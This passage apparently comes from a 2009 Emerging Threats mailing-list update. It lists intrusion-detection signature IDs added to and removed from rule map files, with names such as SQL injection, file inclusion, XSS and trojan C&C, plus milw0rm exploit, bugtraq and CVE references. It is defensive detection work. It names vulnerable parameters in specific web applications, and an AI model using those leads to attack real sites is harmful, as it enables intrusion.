url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_BibCiter || url,doc.emergingthreats.net/2009740 || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009741 || ET WEB_SPECIFIC BibCiter contacts.php idc Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_BibCiter || url,doc.emergingthreats.net/2009741 || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009742 || ET WEB_SPECIFIC BibCiter users.php idu Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_BibCiter || url,doc.emergingthreats.net/2009742 || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009743 || ET WEB_SPECIFIC phpDatingClub website.php page Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHPDating || url,doc.emergingthreats.net/2009743 || url,milw0rm.com/exploits/6037 || bugtraq,30176 2009744 || ET WEB_SPECIFIC SuperNews valor.php noticia Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_SuperNews || url,doc.emergingthreats.net/2009744 || bugtraq,34195 || url,milw0rm.com/exploits/8255 2009745 || ET WEB_SPECIFIC Flatchat pmscript.php with Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Flatchat || url,doc.emergingthreats.net/2009745 || bugtraq,34734 || url,milw0rm.com/exploits/8549 2009746 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_QuickTeam || url,doc.emergingthreats.net/2009746 || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009747 || ET WEB_SPECIFIC AvailScript Article Script articles.php aIDS Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_AvailScript || url,doc.emergingthreats.net/2009747 || url,milw0rm.com/exploits/6409 || url,secunia.com/advisories/31816/ || cve,CVE-2008-4371 2009748 || ET WEB Possible Wordpress Administrative Password Reset Vulnerability || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Wordpress || url,doc.emergingthreats.net/2009748 || url,www.securitytracker.com/alerts/2009/Aug/1022707.html 2009749 || ET SCAN Unusually Fast 403 Error Messages, Possible Web Application Scan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_403 || url,doc.emergingthreats.net/2009749 || url,www.checkupdown.com/status/E403.html -> Added to emerging-web_sql_injection.rules (1): #by Blake Hartstein of Demarc [---] Removed non-rule lines: [---] -> Removed from emerging-policy.rules (1): #by Blake Hartstein of Demarc -> Removed from emerging-sid-msg.map (86): 2001239 || ET Cisco Device in Config Mode || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Cisco || url,doc.emergingthreats.net/bin/view/Main/2001239 2001240 || ET Cisco Device New Config Built || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Cisco || url,doc.emergingthreats.net/bin/view/Main/2001240 2002801 || ET POLICY Google Desktop User-Agent Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002801 || url,news.com.com/2100-1032_3-6038197.html 2002838 || ET POLICY Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html 2002849 || ET POLICY Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509 2003634 || ET WEB_SPECIFIC Suspicious User-Agent - get-minimal - Possible Vuln Scan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_get-minimal_UA || url,doc.emergingthreats.net/2003634 2009711 || ET TROJAN Win32.Runner (Often Rootkit) - POST || url,www.threatexpert.com/threats/trojan-win32-runner.html || url,www.spywarecease.com/spyware-list/Spyware_Trojan.Win32.Runner.s.html 2009712 || ET MALWARE Adware PlusDream - GET Config Download/Update 2009713 || ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected || url,myitforum.com/cs2/blogs/cmosby/archive/2009/07/22/born-on-the-4th-of-july-symantec-security-blogs.aspx || url,www.symantec.com/norton/security_response/writeup.jsp?docid=2009-070814-5311-99&tabid=2 2009714 || ET WEB Script tag in URI, Possible Cross Site Scripting Attempt || url,ha.ckers.org/xss.html 2009715 || ET WEB Onmouseover= in URI - Likely Cross Site Scripting Attempt || url,www.w3schools.com/jsref/jsref_onmouseover.asp 2009716 || ET WEB_SPECIFIC ECShop user.php order_sn Parameter SQL Injection || url,milw0rm.com/exploits/8548 || bugtraq,34733 2009717 || ET WEB_SPECIFIC 1024 CMS standard.php page_include Parameter Remote File Inclusion || url,milw0rm.com/exploits/8003 || url,vupen.com/english/advisories/2009/0360 2009718 || ET WEB_SPECIFIC AvailScript Photo Album Script pics.php sid Parameter SQL Injection || url,milw0rm.com/exploits/6411 || bugtraq,31085 2009719 || ET WEB_SPECIFIC pHNews comments.php templates_dir Local File Inclusion || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009720 || ET WEB_SPECIFIC pHNews comments.php template Local File Inclusion || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009723 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009724 || ET WEB_SPECIFIC QuickTeam qte_init.php qte_root Parameter Local File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009725 || ET WEB_ACTIVEX Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow || bugtraq,23412 || url,milw0rm.com/exploits/8824 2009726 || ET WEB_SPECIFIC TotalCalendar config.php inc_dir Parameter Local File Inclusion || url,milw0rm.com/exploits/8494 || bugtraq,34617 2009727 || ET WEB_SPECIFIC Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection || url,milw0rm.com/exploits/6922 || bugtraq,32039 || cve,CVE-2008-6242 2009728 || ET WEB_SPECIFIC NotFTP config.php languages Parameter Local File Inclusion || bugtraq,34636 || url,milw0rm.com/exploits/8504 2009729 || ET WEB_SPECIFIC TotalCalendar cms_detect.php include Parameter Local File Inclusion || bugtraq,34634 || url,milw0rm.com/exploits/8503 2009730 || ET WEB_SPECIFIC JobHut browse.php pk Parameter SQL Injection || url,milw0rm.com/exploits/8318 || bugtraq,34300 2009731 || ET WEB_SPECIFIC VS Panel showcat.php Cat_ID Parameter SQL Injection || url,milw0rm.com/exploits/8506 || bugtraq,34648 2009733 || ET WEB_SPECIFIC Golabi index_logged.php cur_module Parameter Remote File Inclusion || bugtraq,33916 || url,vupen.com/english/advisories/2009/0553 || url,milw0rm.com/exploits/8112 2009734 || ET WEB_SPECIFIC 212cafe Board view.php qID Parameter SQL Injection || url,milw0rm.com/exploits/6578 || url,xforce.iss.net/xforce/xfdb/45428 || bugtraq,31426 2009735 || ET WEB_ACTIVEX Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow || url,milw0rm.com/exploits/8835 || url,xforce.iss.net/xforce/xfdb/50868 2009736 || ET WEB_SPECIFIC ProjectCMS select_image.php dir Parameter Directory Traversal || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009737 || ET WEB_SPECIFIC ProjectCMS admin_theme_remove.php file Parameter Remote Directory Delete || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009738 || ET WEB_SPECIFIC X-BLC get_read.php section Parameter SQL Injection || bugtraq,34197 || url,milw0rm.com/exploits/8258 2009739 || ET WEB_SPECIFIC DMXReady Multiple Products upload_image_category.asp cid Parameter SQL Injection || url,milw0rm.com/exploits/7767 || url,xforce.iss.net/xforce/xfdb/47959 || bugtraq,33253 2009740 || ET WEB_SPECIFIC BibCiter projects.php idp Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009741 || ET WEB_SPECIFIC BibCiter contacts.php idc Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009742 || ET WEB_SPECIFIC BibCiter users.php idu Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009743 || ET WEB_SPECIFIC phpDatingClub website.php page Parameter Local File Inclusion || url,milw0rm.com/exploits/6037 || bugtraq,30176 2009744 || ET WEB_SPECIFIC SuperNews valor.php noticia Parameter SQL Injection || bugtraq,34195 || url,milw0rm.com/exploits/8255 2009745 || ET WEB_SPECIFIC Flatchat pmscript.php with Parameter Local File Inclusion || bugtraq,34734 || url,milw0rm.com/exploits/8549 2009746 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009747 || ET WEB_SPECIFIC AvailScript Article Script articles.php aIDS Parameter SQL Injection || url,milw0rm.com/exploits/6409 || url,secunia.com/advisories/31816/ || cve,CVE-2008-4371 2009748 || ET WEB Possible Wordpress Administrative Password Reset Vulnerability || url,www.securitytracker.com/alerts/2009/Aug/1022707.html 2009749 || ET SCAN Unusually Fast 403 Error Messages, Possible Web Application Scan || url,www.checkupdown.com/status/E403.html 2500166 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500167 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500168 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500169 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510166 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510167 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510168 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510169 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (86): 2001239 || ET Cisco Device in Config Mode || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Cisco || url,doc.emergingthreats.net/bin/view/Main/2001239 2001240 || ET Cisco Device New Config Built || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Cisco || url,doc.emergingthreats.net/bin/view/Main/2001240 2002801 || ET POLICY Google Desktop User-Agent Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002801 || url,news.com.com/2100-1032_3-6038197.html 2002838 || ET POLICY Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html 2002849 || ET POLICY Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509 2003634 || ET WEB_SPECIFIC Suspicious User-Agent - get-minimal - Possible Vuln Scan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_get-minimal_UA || url,doc.emergingthreats.net/2003634 2009711 || ET TROJAN Win32.Runner (Often Rootkit) - POST || url,www.threatexpert.com/threats/trojan-win32-runner.html || url,www.spywarecease.com/spyware-list/Spyware_Trojan.Win32.Runner.s.html 2009712 || ET MALWARE Adware PlusDream - GET Config Download/Update 2009713 || ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected || url,myitforum.com/cs2/blogs/cmosby/archive/2009/07/22/born-on-the-4th-of-july-symantec-security-blogs.aspx || url,www.symantec.com/norton/security_response/writeup.jsp?docid=2009-070814-5311-99&tabid=2 2009714 || ET WEB Script tag in URI, Possible Cross Site Scripting Attempt || url,ha.ckers.org/xss.html 2009715 || ET WEB Onmouseover= in URI - Likely Cross Site Scripting Attempt || url,www.w3schools.com/jsref/jsref_onmouseover.asp 2009716 || ET WEB_SPECIFIC ECShop user.php order_sn Parameter SQL Injection || url,milw0rm.com/exploits/8548 || bugtraq,34733 2009717 || ET WEB_SPECIFIC 1024 CMS standard.php page_include Parameter Remote File Inclusion || url,milw0rm.com/exploits/8003 || url,vupen.com/english/advisories/2009/0360 2009718 || ET WEB_SPECIFIC AvailScript Photo Album Script pics.php sid Parameter SQL Injection || url,milw0rm.com/exploits/6411 || bugtraq,31085 2009719 || ET WEB_SPECIFIC pHNews comments.php templates_dir Local File Inclusion || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009720 || ET WEB_SPECIFIC pHNews comments.php template Local File Inclusion || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009723 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009724 || ET WEB_SPECIFIC QuickTeam qte_init.php qte_root Parameter Local File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009725 || ET WEB_ACTIVEX Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow || bugtraq,23412 || url,milw0rm.com/exploits/8824 2009726 || ET WEB_SPECIFIC TotalCalendar config.php inc_dir Parameter Local File Inclusion || url,milw0rm.com/exploits/8494 || bugtraq,34617 2009727 || ET WEB_SPECIFIC Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection || url,milw0rm.com/exploits/6922 || bugtraq,32039 || cve,CVE-2008-6242 2009728 || ET WEB_SPECIFIC NotFTP config.php languages Parameter Local File Inclusion || bugtraq,34636 || url,milw0rm.com/exploits/8504 2009729 || ET WEB_SPECIFIC TotalCalendar cms_detect.php include Parameter Local File Inclusion || bugtraq,34634 || url,milw0rm.com/exploits/8503 2009730 || ET WEB_SPECIFIC JobHut browse.php pk Parameter SQL Injection || url,milw0rm.com/exploits/8318 || bugtraq,34300 2009731 || ET WEB_SPECIFIC VS Panel showcat.php Cat_ID Parameter SQL Injection || url,milw0rm.com/exploits/8506 || bugtraq,34648 2009733 || ET WEB_SPECIFIC Golabi index_logged.php cur_module Parameter Remote File Inclusion || bugtraq,33916 || url,vupen.com/english/advisories/2009/0553 || url,milw0rm.com/exploits/8112 2009734 || ET WEB_SPECIFIC 212cafe Board view.php qID Parameter SQL Injection || url,milw0rm.com/exploits/6578 || url,xforce.iss.net/xforce/xfdb/45428 || bugtraq,31426 2009735 || ET WEB_ACTIVEX Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow || url,milw0rm.com/exploits/8835 || url,xforce.iss.net/xforce/xfdb/50868 2009736 || ET WEB_SPECIFIC ProjectCMS select_image.php dir Parameter Directory Traversal || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009737 || ET WEB_SPECIFIC ProjectCMS admin_theme_remove.php file Parameter Remote Directory Delete || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009738 || ET WEB_SPECIFIC X-BLC get_read.php section Parameter SQL Injection || bugtraq,34197 || url,milw0rm.com/exploits/8258 2009739 || ET WEB_SPECIFIC DMXReady Multiple Products upload_image_category.asp cid Parameter SQL Injection || url,milw0rm.com/exploits/7767 || url,xforce.iss.net/xforce/xfdb/47959 || bugtraq,33253 2009740 || ET WEB_SPECIFIC BibCiter projects.php idp Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009741 || ET WEB_SPECIFIC BibCiter contacts.php idc Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009742 || ET WEB_SPECIFIC BibCiter users.php idu Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009743 || ET WEB_SPECIFIC phpDatingClub website.php page Parameter Local File Inclusion || url,milw0rm.com/exploits/6037 || bugtraq,30176 2009744 || ET WEB_SPECIFIC SuperNews valor.php noticia Parameter SQL Injection || bugtraq,34195 || url,milw0rm.com/exploits/8255 2009745 || ET WEB_SPECIFIC Flatchat pmscript.php with Parameter Local File Inclusion || bugtraq,34734 || url,milw0rm.com/exploits/8549 2009746 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009747 || ET WEB_SPECIFIC AvailScript Article Script articles.php aIDS Parameter SQL Injection || url,milw0rm.com/exploits/6409 || url,secunia.com/advisories/31816/ || cve,CVE-2008-4371 2009748 || ET WEB Possible Wordpress Administrative Password Reset Vulnerability || url,www.securitytracker.com/alerts/2009/Aug/1022707.html 2009749 || ET SCAN Unusually Fast 403 Error Messages, Possible Web Application Scan || url,www.checkupdown.com/status/E403.html 2500166 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500167 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500168 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500169 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510166 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510167 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510168 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510169 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Sat Aug 15 16:00:12 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 15 Aug 2009 